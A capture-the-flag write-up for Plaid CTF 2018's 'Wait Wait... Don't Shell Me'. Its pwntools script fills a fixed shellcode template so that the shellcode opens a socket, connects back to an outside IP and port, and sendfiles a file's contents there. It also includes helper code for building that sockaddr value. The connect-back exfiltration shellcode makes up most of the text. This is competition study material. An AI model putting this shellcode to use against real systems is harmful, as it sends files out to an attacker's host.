[Plaid CTF 2018] Wait Wait... Don't Shell Me
All fds were closed with close(), so the new socket gets fd 0
Connect back over reverse TCP
open + sendfile
read/write can be optimized (sendfile replaces the read/write pair)
```python
from pwn import *
context.arch = 'amd64'

# Shellcode template handed out by the challenge: the opcode bytes are fixed,
# only the '__' positions (immediates / ModRM bytes) may be filled in.
# Blanks are turned into 0xcc so they can be told apart from fixed bytes.
CODES = bytes.fromhex('''b8 __ __ __ __
bf __ __ __ __
be __ __ __ __
ba __ __ __ __
01 c7
29 fe
21 f2
0f 05
48 b8 __ __ __ __ __ __ __ __
50
b8 __ __ __ __
ba __ __ __ __
bf __ __ __ __
48 89 __
0f 05
be __ __ __ __
bf __ __ __ __
ba __ __ __ __
83 c0 __
0f 05
89 __
b8 __ __ __ __
bf __ __ __ __
41 ba __ __ __ __
0f 05
58'''.replace(' ', '').replace('\n', '').replace('__', 'cc'))

# print(disasm(CODES.replace(b'\xcc', b'\x90'), offset=False, byte=False))


def assemble(code):
    """Assemble `code`, check that it matches the template byte for byte
    outside the blanks, and return the bytes that fill the blanks."""
    codes = asm(code)
    print(disasm(codes))
    print(len(codes), len(CODES))
    assert len(codes) == len(CODES)
    byte = []
    for i in range(len(codes)):
        if CODES[i] != 0xcc:
            assert CODES[i] == codes[i]
        else:
            byte.append(codes[i])
    return byte


# for x in range(0, 0x100000, 0x100):   # scan over candidate path addresses
x = 0
if 1:
    try:
        r = remote('wwdsm.chal.pwning.xxx', 6615, level='error')
        print(r.recv())
        code = '''
        /* socket(AF_INET, SOCK_STREAM, 0): the add/sub/and are fixed by the
           template, so the immediates are chosen to come out right after them:
           edi = (2 - 41) + 41 = 2, esi = 3 - 2 = 1, edx = 0 & 1 = 0.
           Every fd was closed, so the socket becomes fd 0. */
        mov eax, SYS_socket
        mov edi, -SYS_socket+2
        mov esi, 3
        mov edx, 0
        add edi,eax
        sub esi,edi
        and edx,esi
        syscall
        /* connect(0, &sockaddr_in, 16): the sockaddr_in is pushed as one qword */
        movabs rax,0x864add12d2040002 /*ip port AF_INET*/
        push rax
        mov eax,SYS_connect
        mov edx,0x10
        mov edi,0
        mov rsi,rsp
        syscall
        /* open(path, O_RDONLY, 0): connect returned 0, so eax + SYS_open == SYS_open */
        mov esi,0
        mov edi,0x400cb8+{}
        mov edx,0
        add eax,SYS_open
        syscall
        /* sendfile(0, fd, NULL, 0x999): the file goes straight to the socket */
        mov esi, eax
        mov eax, SYS_sendfile
        mov edi,0
        mov r10d,0x999
        syscall
        pop rax
        '''.format(x)
        p = assemble(code)
        p = '\n'.join('%02x' % b for b in p)   # one fill byte per line, as hex
        r.sendline(p.encode())
        print(r.recv())
        print(r.recvuntil(b'won!\n'))
        print(0)
        # r.sendline(b'asdf')
        print(r.recv())
        print(r.recv())
        print(r.recv())
        print(r.recv())
    except KeyboardInterrupt:
        pass
    except Exception as e:
        print(e)
    finally:
        print(x)
```
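Added example, not the writeup's own code and stdlib only (no pwntools): helpers that build and decode the sockaddr_in qword behind `movabs rax,0x864add12d2040002`, plus a template check that, like the script's assemble(), extracts the fill bytes but rejects a candidate that disagrees with the template at a fixed byte. The short template and the two candidate byte strings at the bottom are constructed for the sample.

```python
import socket
import struct


def sockaddr_in_imm(ip, port):
    """Pack struct sockaddr_in (family, port, addr) into the little-endian
    qword that `movabs rax, imm64 ; push rax` leaves on the stack."""
    raw = (struct.pack('<H', int(socket.AF_INET))   # sin_family, host order
           + struct.pack('>H', port)                # sin_port, network order
           + socket.inet_aton(ip))                  # sin_addr
    return struct.unpack('<Q', raw)[0]

def decode_sockaddr_imm(imm):
    """Inverse of sockaddr_in_imm: recover (ip, port) from the immediate."""
    raw = struct.pack('<Q', imm)
    family = struct.unpack('<H', raw[:2])[0]
    port = struct.unpack('>H', raw[2:4])[0]
    assert family == socket.AF_INET, 'not an AF_INET sockaddr'
    return socket.inet_ntoa(raw[4:8]), port

def parse_template(text):
    """Turn 'b8 __ __ __ __ 0f 05' into (fixed bytes, blank mask)."""
    toks = text.split()
    fixed = bytes(0 if t == '__' else int(t, 16) for t in toks)
    blank = [t == '__' for t in toks]
    return fixed, blank

def fill_bytes(template_text, code):
    """Return the bytes that go into the blanks, or None when `code` has the
    wrong length or disagrees with the template at a fixed position."""
    fixed, blank = parse_template(template_text)
    if len(code) != len(fixed):
        return None
    if any(not b and c != f for b, f, c in zip(blank, fixed, code)):
        return None
    return [c for b, c in zip(blank, code) if b]


# Constructed sample: the template's first instruction plus the fixed syscall,
# filled with `mov eax, 41` (SYS_socket) and, as a bad candidate, `mov edi, 41`.
SAMPLE_TEMPLATE = 'b8 __ __ __ __ 0f 05'
SAMPLE_CODE = bytes.fromhex('b8 29 00 00 00 0f 05')
BAD_CODE = bytes.fromhex('bf 29 00 00 00 0f 05')

if __name__ == '__main__':
    print(hex(sockaddr_in_imm('18.221.74.134', 1234)))  # 0x864add12d2040002
    print(decode_sockaddr_imm(0x864add12d2040002))
    print(fill_bytes(SAMPLE_TEMPLATE, SAMPLE_CODE), fill_bytes(SAMPLE_TEMPLATE, BAD_CODE))
```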